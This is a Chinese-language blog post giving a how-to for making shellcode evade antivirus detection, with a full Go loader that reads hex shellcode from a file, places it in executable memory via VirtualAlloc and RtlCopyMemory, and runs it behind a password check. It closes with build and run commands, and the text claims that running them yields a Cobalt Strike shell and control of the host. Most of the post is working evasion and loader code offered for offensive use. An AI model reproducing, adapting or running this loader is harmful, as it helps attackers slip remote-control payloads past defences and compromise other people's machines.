【原創】ShellCode免殺的騷姿勢

黑羽sec發表於2022-05-05

ShellCode免殺的騷姿勢

常見的免殺手法:

shellcode(攻擊程式碼)和載入程式的分離;
Lolbins白利用載入shellcode(白名單利用);
shellcode混淆、編碼解碼;

shellcode(攻擊程式碼)和載入程式的分離

生成一個C語言的playload做測試實驗;

image-20220505101255117

本質上生成c的payload就是16進位制的程式碼,這些程式碼插入目標主機的記憶體中,就能觸發CS遠控;

image-20220505101650083

這裡我們在來看下官方的定義;

shellcode是一段用於利用軟體漏洞而執行的程式碼,shellcode為16進位制的機器碼,因為經常讓攻擊者獲得shell而得名。shellcode常常使用機器語言編寫。 可在暫存器eip溢位後,塞入一段可讓CPU執行的shellcode機器碼,讓電腦可以執行攻擊者的任意指令。

但shellcode類似於圖紙,本身並不能進行執行,必須要配合載入器才能進行使用,所以一般殺軟不會殺shellcode;exe檔案就是shellcode+載入器一起整合了,容易被查殺;

單獨的載入器可以使用go-shellcode-launcher

package main

import (
	"io/ioutil"
	"os"
	"syscall"
	"unsafe"
	"strings"
	"fmt"
	"encoding/hex"
	"crypto/md5"
)

const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)
var (
	kernel32       = syscall.MustLoadDLL("kernel32.dll")
	ntdll          = syscall.MustLoadDLL("ntdll.dll")
	VirtualAlloc   = kernel32.MustFindProc("VirtualAlloc")
	RtlCopyMemory  = ntdll.MustFindProc("RtlCopyMemory")
	)

func checkErr(err error) {
	if err != nil {
		if err.Error() != "The operation completed successfully." {
			println(err.Error())
			os.Exit(1)
		}
	}
}
func main() {


	if len(os.Args) <= 2 {
		os.Exit(0)
	}

	//var shellcodes string
	var shellcode []byte

	if len(os.Args) > 2 {
		data := []byte(os.Args[1])
		has := md5.Sum(data)
		md5str1 := fmt.Sprintf("%x", has) //將[]byte轉成16進位制
		if (md5str1) != "81592ae4e09eb3dfb96aaecbf84730d0" {
			//第一個引數只有是 bobohacker 才能跑起
			os.Exit(0)
		}

		if fileObj, err := os.Open(os.Args[2]); err == nil {
			//第二個引數為放shellcode的txt檔名
			defer fileObj.Close()
			if contents, err := ioutil.ReadAll(fileObj); err == nil {
				shellcodes := strings.ReplaceAll(string(contents), "\n", "")
				shellcodes = strings.ReplaceAll(string(shellcodes), "\\x", "")
				shellcode, _ = hex.DecodeString(shellcodes)
			}

		}
	}
	addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	if addr == 0 {
		checkErr(err)
	}
	_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
	checkErr(err)
	syscall.Syscall(addr, 0, 0, 0, 0)
}

繼續生成payload123.c,然後將payload的內容複製出來,放在bobo.txt中

image-20220505125100039

將go的檔案編譯成exe檔案

go build golauncher.go

然在目錄下執行

golauncher.exe bobohacker bobo.txt
其中的bobohacker是密碼;

image-20220505125409943

然後就觸發shell,拿下主機;

image-20220505133918728

相關文章